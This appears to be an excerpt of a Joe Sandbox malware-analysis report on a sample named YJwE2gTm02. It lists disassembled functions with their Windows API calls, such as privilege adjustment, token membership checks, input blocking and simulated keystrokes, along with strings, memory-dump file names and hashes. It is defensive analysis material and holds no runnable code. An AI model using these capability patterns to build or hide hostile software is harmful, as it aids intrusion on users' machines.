Instruction Fuzzy Hash: F331B574911228ABCB21DF68DD8979DBBB8BF48710F5041EAE41CA7261E7309F858F45

Function 009751CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009751DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00975238
SetErrorMode.KERNEL32(00000000), ref: 009752A1

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 2e3dc2b90afe5bec079e9b23e9abc3c5bd655735a0f36fc9b1703a5130c3d575
Instruction ID: 6cc32ff14b4407d8029e57927b2e04338ac53b5865d23aeca3d36a271f4700d7
Opcode Fuzzy Hash: 2e3dc2b90afe5bec079e9b23e9abc3c5bd655735a0f36fc9b1703a5130c3d575
Instruction Fuzzy Hash: E2318E75A00518DFDB00DF54D884FADBBB4FF48314F098099E909AB3A2CB31E846CBA1

Function 009616C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0091FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00920668
Part of subcall function 0091FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00920685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0096170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0096173A
GetLastError.KERNEL32 ref: 0096174A

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 8d960e4bb3c9aa4c4e3986db8f0bf27637e2447f4a62bae10924383e549eae28
Instruction ID: 0eb09ce907fbbea8165b23ed925f100464af2bfa596b4bc92518e1079b3c0006
Opcode Fuzzy Hash: 8d960e4bb3c9aa4c4e3986db8f0bf27637e2447f4a62bae10924383e549eae28
Instruction Fuzzy Hash: D211A0B2514309AFD718AF54ECC6EABB7BDEB44714B24852EF05657681EB70FC818B20

Function 0096D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0096D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0096D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0096D650

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: e0715c16c04e183f3a0790514d3b4a14bd6a46e1592eb602e193c20292519d54
Instruction ID: 72522017be0c3ede0342b8a5298eb19939016fbdcbce5e14c1e8c97871f6903b
Opcode Fuzzy Hash: e0715c16c04e183f3a0790514d3b4a14bd6a46e1592eb602e193c20292519d54
Instruction Fuzzy Hash: EE11C4B1E05228BFDB208F98DD45FAFBFBCEB45B50F108112F914E7290C2704A018BA1

Function 00961663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0096168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009616A1
FreeSid.ADVAPI32(?), ref: 009616B1

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: f04fc9dae9a59dc8955d1c88e346dc926a532472ecc11e296ccbcfd9b1d1ab15
Instruction ID: 94766d6adac64c5ec4827df703eeca009c191206f98e87386bde8b2b20845213
Opcode Fuzzy Hash: f04fc9dae9a59dc8955d1c88e346dc926a532472ecc11e296ccbcfd9b1d1ab15
Instruction Fuzzy Hash: 19F0F4B5950309FBDF00DFE4DD89AAEBBBCEB08604F504565E501E2191E774AA449A50

Function 00924CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(009328E9,?,00924CBE,009328E9,009C88B8,0000000C,00924E15,009328E9,00000002,00000000,?,009328E9), ref: 00924D09
TerminateProcess.KERNEL32(00000000,?,00924CBE,009328E9,009C88B8,0000000C,00924E15,009328E9,00000002,00000000,?,009328E9), ref: 00924D10
ExitProcess.KERNEL32 ref: 00924D22

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: f187bfd02ae63c97f75416204590aa63dbbacd1bf12017546dad442eb64282fa
Instruction ID: b0aaf6d725f7d3686b901d0d853ceb8e97dfe0f3f06fe1803e0813a86e613423
Opcode Fuzzy Hash: f187bfd02ae63c97f75416204590aa63dbbacd1bf12017546dad442eb64282fa
Instruction Fuzzy Hash: 40E0B671018158BFCF21AF58EE0AA583B69EB81B85F108015FC098B166CB35ED42DB90

Function 0093C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 0093C36C

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 47384c3b02bba2fdfeafa01e3fb86eaf1114ca527aa4c319785acf05f3cb8c35
Instruction ID: d63d883867158f4aaaec8681431ae81e06b04834f538bd5ff81f49e8fd8ef7c8
Opcode Fuzzy Hash: 47384c3b02bba2fdfeafa01e3fb86eaf1114ca527aa4c319785acf05f3cb8c35
Instruction Fuzzy Hash: BA4126B6900619AFCB20AFB9DC49EAB77BDEB84354F104269F915E7180E670AD818F50

Function 0095D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0095D28C

Strings

X64, xrefs: 0095D2A8

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: 5939474707185322049636bde5f3f3fccc802d4c21acc59032e65f3addcd957b
Instruction ID: 832e0141a7acaa163320a724363b57b154965e5f3065441c0262ebaac27ea3ad
Opcode Fuzzy Hash: 5939474707185322049636bde5f3f3fccc802d4c21acc59032e65f3addcd957b
Instruction Fuzzy Hash: E2D0C9B491611DEECF90CB90DC88DDDB37CBB04305F100552F506A2000D77495489F20

Function 0092CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: c3cee2f86c7033d6cea2e8c7a3e6ed8f08dfa81a022efc4555d9041d4f50a7a5
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 1C023DB1E011299BDF14CFA9D9806ADBBF5EF88314F25416AD819E7384D731AE41CB84

Function 009768EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00976918
FindClose.KERNEL32(00000000), ref: 00976961

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f6835aca4ed8fa641df064f7f1c45c1eb10880b1afee8bad9b4fa1d3536e09e6
Instruction ID: 6c97b1e28f416c8144b7da0f75bd003767d0f41493af5d3fd4fb3324a2f05582
Opcode Fuzzy Hash: f6835aca4ed8fa641df064f7f1c45c1eb10880b1afee8bad9b4fa1d3536e09e6
Instruction Fuzzy Hash: DD11E2726046019FC710CF29C884A1ABBE4FF84328F04C699F5698F3A2CB30EC05CB91

Function 009737B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00984891,?,?,00000035,?), ref: 009737E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00984891,?,?,00000035,?), ref: 009737F4

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 81fe59c534cadccaab75baf4fa7d96d0192ab2f7cf6de6cb09f82361f4453166
Instruction ID: e922d01139ef2af5d932784598fb01adcc017d66d9a9132dec07f2e8aff1681e
Opcode Fuzzy Hash: 81fe59c534cadccaab75baf4fa7d96d0192ab2f7cf6de6cb09f82361f4453166
Instruction Fuzzy Hash: 12F0E5B16042292AEB20176A8C4DFEB3BAEEFC4B61F004165F509E2281DA609944D6B0

Function 0096B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0096B25D
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 0096B270

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 1a8ba753361ee16f98feeb26da1ecc57b729f21934191fa6c2219ece1f1ace66
Instruction ID: 2cabcd173f7df746a08fac6634d71507d1513533e98b2f21d492b4da00913e3f
Opcode Fuzzy Hash: 1a8ba753361ee16f98feeb26da1ecc57b729f21934191fa6c2219ece1f1ace66
Instruction Fuzzy Hash: DAF01D7181428DABDB059FA4C805BAE7BB4FF04305F00841AF965A5192D37996519F94

Function 009610BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009611FC), ref: 009610D4
CloseHandle.KERNEL32(?,?,009611FC), ref: 009610E9

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 570447ff41298b61134889aa034ffb53a2d94f0156253b2639b18373f9dd2ec7
Instruction ID: b4dc661d74b5ee1d86183b59cd30c9aa4d9846c7644d3676f276795f917125fd
Opcode Fuzzy Hash: 570447ff41298b61134889aa034ffb53a2d94f0156253b2639b18373f9dd2ec7
Instruction Fuzzy Hash: D6E0BF72118614AEEB252B55FC06FB777A9EB04310F14882EF5A6804B1DB626CE0EB60

Function 0090CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00950C40

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 467e9bae19264221135c2b1edebe59948e14667f1e6e79f912569481621472cb
Instruction ID: 0638a511a686bb765514827da2b87fe935ecd8eb5eabc4e6912cc1fde19f00bd
Opcode Fuzzy Hash: 467e9bae19264221135c2b1edebe59948e14667f1e6e79f912569481621472cb
Instruction Fuzzy Hash: 3A329DB0900219DFDF14DF90C881BEDB7B9BF85304F248559E806AB2D2DB75AE49CB51

Function 0093676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00936766,?,?,00000008,?,?,0093FEFE,00000000), ref: 00936998

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 340d463bc10b7b787dc2b5d2787957bb997b78120b37c630059987faaa6c34b8
Instruction ID: fceabc72f54b2d3de314854b4c6e744df2fbc2710776a9c1f00d6c6c17d6b9f6
Opcode Fuzzy Hash: 340d463bc10b7b787dc2b5d2787957bb997b78120b37c630059987faaa6c34b8
Instruction Fuzzy Hash: D8B13975610608AFD719CF28C48AB657BE0FF49364F25C658E89ACF2A2C735E991CF40

Function 0091B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0095851F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4263c4592543a2a92c4ade4c84f5f06b74593bb296c2457033c75cc2da7f6677
Instruction ID: 4721f4580945d7a71c0dbd3d114be420df1e32029e9197d5a520238583137fe7
Opcode Fuzzy Hash: 4263c4592543a2a92c4ade4c84f5f06b74593bb296c2457033c75cc2da7f6677
Instruction Fuzzy Hash: A9125E71A002299FDB24CF59C8817EEB7B5FF48710F14819AE849EB255EB349E85CF90

Function 0097EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0097EABD

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 9700814da0934082ae05711b735f987135b263a6e1ee544963ab194e594dd796
Instruction ID: eaba7202e266e47afdf3de5f2d7290e50b2d1e5bf87475d99254f9f1d81d9ba8
Opcode Fuzzy Hash: 9700814da0934082ae05711b735f987135b263a6e1ee544963ab194e594dd796
Instruction Fuzzy Hash: ABE01A762102059FC710EF59D804E9AB7E9AF98760F008456FD49C7291DA70A8408B91

Function 009209D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009203EE), ref: 009209DA

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c656b72b14113f306f5e5fe6910c75c003cd9febff24e67c6ba295637e04906a
Instruction ID: af3c03078a30b7f807ab9e55add69f727802c56bff77a5c21b4d0aaf3a21f16f
Opcode Fuzzy Hash: c656b72b14113f306f5e5fe6910c75c003cd9febff24e67c6ba295637e04906a
Instruction Fuzzy Hash:

Function 0092781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0092798B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: 116c0dd50df7e76b6f107e47877ba1971f94576e04a729a97af18c09abe857ca
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: 6551587560C7356BDB3895E8B89A7BFE38D9B42300F180909E982F728EC615DE85D352

Function 00936DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c37133dc0540a330e7d315dd5d61a60c3cbc70df1005201e5d71b3a15c92cfec
Instruction ID: 714aecca8285ddd0ddaad68404648212b339442eb5c8f3a40eba198ff81484d4
Opcode Fuzzy Hash: c37133dc0540a330e7d315dd5d61a60c3cbc70df1005201e5d71b3a15c92cfec
Instruction Fuzzy Hash: F4321162D2DF014DD7239638C822336A64DAFB73C5F25C727F81AB59A6EB29C4835540

Function 0091CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bc84410cdd88879be781424ab0c5ad35b351094cbd88bc728d77c18d3c523de
Instruction ID: a746277a09a179417bd14b9ff7eb80af78082713b91089b1f17356c043aa0efd
Opcode Fuzzy Hash: 8bc84410cdd88879be781424ab0c5ad35b351094cbd88bc728d77c18d3c523de
Instruction Fuzzy Hash: CC322AB1B043098FDF24CF6AC4946BD7BA5EB45302F288966DC99D7291E234DD89DB80

